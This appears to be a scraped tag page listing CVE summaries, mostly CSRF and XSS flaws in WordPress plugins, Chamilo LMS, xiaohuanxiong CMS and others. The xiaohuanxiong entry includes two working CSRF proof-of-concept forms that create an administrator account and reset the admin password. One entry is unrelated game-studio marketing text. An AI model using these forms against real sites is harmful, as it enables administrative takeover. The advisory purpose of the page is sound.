The Amelia WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the lastName parameter found in the ~/src/Application/Controller/User/Customer/AddCustomerController.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user accesses the booking calendar with the date the attacker has injected the malicious payload into. This affects versions up to and including 1.0.46.

CVE-2022-0834: Vulnerability Advisories - Wordfence

An issue was discovered in xiaohuanxiong CMS 5.0.17 There is a CSRF vulnerability that can that can add the administrator account and modify administrator account's password.

After the administrator logged in, open the following two page and Click the button, you can use javascript to create a PoC that is triggered directly  
poc:one--->add new administrator account

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://xiaohuangxiong.test/admin.php/Admins/create.html" method="POST">
          <input type="hidden" name="username" value="admin2" />
          <input type="hidden" name="password" value="123456" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://xiaohuangxiong.test/admin.php/Admins/edit.html" method="POST">
          <input type="hidden" name="id" value="1" />
          <input type="hidden" name="username" value="admin" />
          <input type="hidden" name="password" value="12345678" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2021-43738: There is two CSRF vulnerability that can add the administrator account and modify administrator account's password · Issue #28 · hiliqi/xiaohuanxiong

A Cross-Site Request Forgery (CSRF) in Chamilo LMS 1.11.14 allows attackers to execute arbitrary commands on victim hosts via user interaction with a crafted URL.

CVE-2021-40662: Security issues - Chamilo LMS

Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.

CVE-2021-38745: Security issues - Chamilo LMS

BigAnt Software BigAnt Server v5.6.06 was discovered to contain a Cross-Site Request Forgery (CSRF).

**![logo](https://www.bigant.com/wp/wp-content/uploads/2014/03/logo.png)**

![](https://www.bigant.com/wp/wp-content/uploads/2015/07/l_ba.jpg)

**Support**

Comments? Queries? Having an issue? Contact Big Ant Support here.

![](https://www.bigant.com/wp/wp-content/uploads/2015/07/l_fb.jpg)

**Facebook**

Go to the Big Ant Facebook page for the latest news.

![](https://www.bigant.com/wp/wp-content/uploads/2015/07/l_t.jpg)

**Twitter**

Go to the Big Ant Twitter page for current updates.

**AO Tennis 2 is available now!**

BIGBEN and Big Ant Studios, Australia’s leading developer of sports titles, are delighted to announce their partnership for the publishing ...

**BIGANTFORUMS**

Join the Big Ant forums and keep up to date with the latest news and current hot topics.

Become part of the BigAnt community.

GO TO FORUMS

CVE-2022-23349: Big Ant Studios | Great Games

The Advanced Contact form 7 DB WordPress plugin before 1.8.7 does not have authorisation nor CSRF checks in the acf7_db_edit_scr_file_delete AJAX action, and does not validate the file to be deleted, allowing any authenticated user to delete arbitrary files on the web server. For example, removing the wp-config.php allows attackers to trigger WordPress setup again, gain administrator privileges and execute arbitrary code or display arbitrary content to the users.

CVE-2021-24905

The Amelia WordPress plugin before 1.0.47 does not have CSRF check in place when deleting customers, which could allow attackers to make a logged in admin delete arbitrary customers via a CSRF attack

CVE-2022-0616

The 3D FlipBook WordPress plugin before 1.12.1 does not have authorisation and CSRF checks when updating its settings, and does not have any sanitisation/escaping, allowing any authenticated users, such as subscriber to put Cross-Site Scripting payloads in all pages with a 3d flipbook.

CVE-2022-0423

The Simple Membership WordPress plugin before 4.1.0 does not have CSRF check in place when deleting Transactions, which could allow attackers to make a logged in admin delete arbitrary transactions via a CSRF attack

CVE-2022-0681

Cross-Site Request Forgery (CSRF) in GitHub repository crater-invoice/crater prior to 6.0.4.

Tag

#csrf